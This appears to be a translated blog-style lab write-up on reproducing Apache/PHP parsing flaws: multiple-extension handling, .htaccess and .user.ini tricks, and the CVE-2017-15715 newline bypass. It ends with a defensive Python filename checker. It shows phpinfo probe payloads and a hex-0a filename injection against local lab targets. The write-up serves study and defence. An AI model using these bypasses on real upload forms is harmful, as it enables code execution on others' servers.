Middleware vulnerability reproduction: Apache
2022-07-06 09:22:00 【又懒有菜】
Contents
0x0d Apache HTTPD newline parsing vulnerability (CVE-2017-15715)
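0x0a httpd.conf misconfiguration (multiple-extension parsing vulnerability)
AddHandler application/x-httpd-php .php
When a filename has several extensions, it is recognized as a PHP file as long as one of them is .php.
Local reproduction:
Edit the file httpd.conf (apache/conf/httpd.conf):
Add: AddHandler application/x-httpd-php .php
Create the file: phpinfo.php.jpg
Contents: <?php phpinfo();?>
Visit: 127.0.0.1/phpinfo.php.jpg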
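0x0b .htaccess parsing vulnerability
AddType application/x-httpd-php .jpg: every jpg file under that path is parsed as a PHP file when requested over HTTP
Local reproduction:
Upload a .htaccess file (local)
Contents: AddType application/x-httpd-php .jpg
Upload the file phpinfo.jpg (local)
Contents: GIF89a<?php phpinfo();?>
Visit: 127.0.0.1/phpinfo.jpg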
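0x0c .user.ini parsing vulnerability
Environment: ctfshow web 153
Principle: PHP file inclusion through .user.ini
auto_append_file=filename ; appends include("filename") to the end of every PHP file in the same directory
auto_prepend_file=filename ; prepends include("filename") to the start of every PHP file in the same directory
Upload 1.png
<?php phpinfo();?>
Note: then request any PHP file in that directory. Because index.php already exists there, no PHP file needs to be uploaded for the content to be parsed.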
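0x0d Apache HTTPD newline parsing vulnerability (CVE-2017-15715)
Environment: vulhub
Affected versions: 2.4.0 to 2.4.29
Starting the environment:
- Right-click in the CVE-2017-15715 folder and open a terminal
- sudo docker-compose up -d
- Visit ip+8000
Capture the request in Burp and modify the parameter value
Append a c after evil.php -> select its hex code and modify it -> 0a
Visit the URL: 192.168.0.10:8080/evil.php%0a
Summary: mind map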
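A defensive upload-filename check covering the four cases above, added here as an example (it is not code from the original post). The extension sets, sample names and function names are assumptions; PHP_HANDLER mirrors a `<FilesMatch \.php$>` handler mapping, where `$` matching before a trailing newline is the CVE-2017-15715 behavior, and Python's `re` treats `$` the same way.

```python
import re

# Mirrors a <FilesMatch \.php$> handler mapping. As in Apache's regex engine,
# "$" in Python's re also matches just before a trailing "\n".
PHP_HANDLER = re.compile(r"\.php$")

CONFIG_FILES = {".htaccess", ".user.ini"}          # per-directory config files
SCRIPT_EXTS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar"}  # assumed
ALLOWED_EXTS = {"jpg", "jpeg", "png", "gif"}       # assumed upload policy

# Constructed sample names, one per case discussed on this page.
SAMPLES = ["photo.jpg", "phpinfo.php.jpg", ".htaccess", ".user.ini",
           "evil.php\n", "evil.php"]


def naive_blacklist_ok(name: str) -> bool:
    """Weak check: compares only the text after the last dot."""
    return name.rsplit(".", 1)[-1].lower() not in SCRIPT_EXTS


def strict_upload_ok(name: str) -> bool:
    """Hardened check: allowlist plus the cases the weak check misses."""
    # Control characters (the 0x0a case) and path separators are never valid.
    if any(ord(c) < 0x20 or c in "/\\" for c in name):
        return False
    lowered = name.lower()
    # Dotfiles include .htaccess and .user.ini, which reconfigure parsing.
    if lowered in CONFIG_FILES or lowered.startswith("."):
        return False
    parts = lowered.split(".")
    # Multi-extension case: a script extension in any position is rejected.
    if len(parts) < 2 or any(p in SCRIPT_EXTS for p in parts[1:]):
        return False
    return parts[-1] in ALLOWED_EXTS


def audit(names):
    """Return {name: (naive_ok, handler_matches, strict_ok)}."""
    return {n: (naive_blacklist_ok(n), bool(PHP_HANDLER.search(n)),
                strict_upload_ok(n)) for n in names}


if __name__ == "__main__":
    for name, result in audit(SAMPLES).items():
        print(repr(name), result)
```

The name check does not inspect file contents; the server side still needs per-directory overrides disabled and script execution turned off in the upload directory.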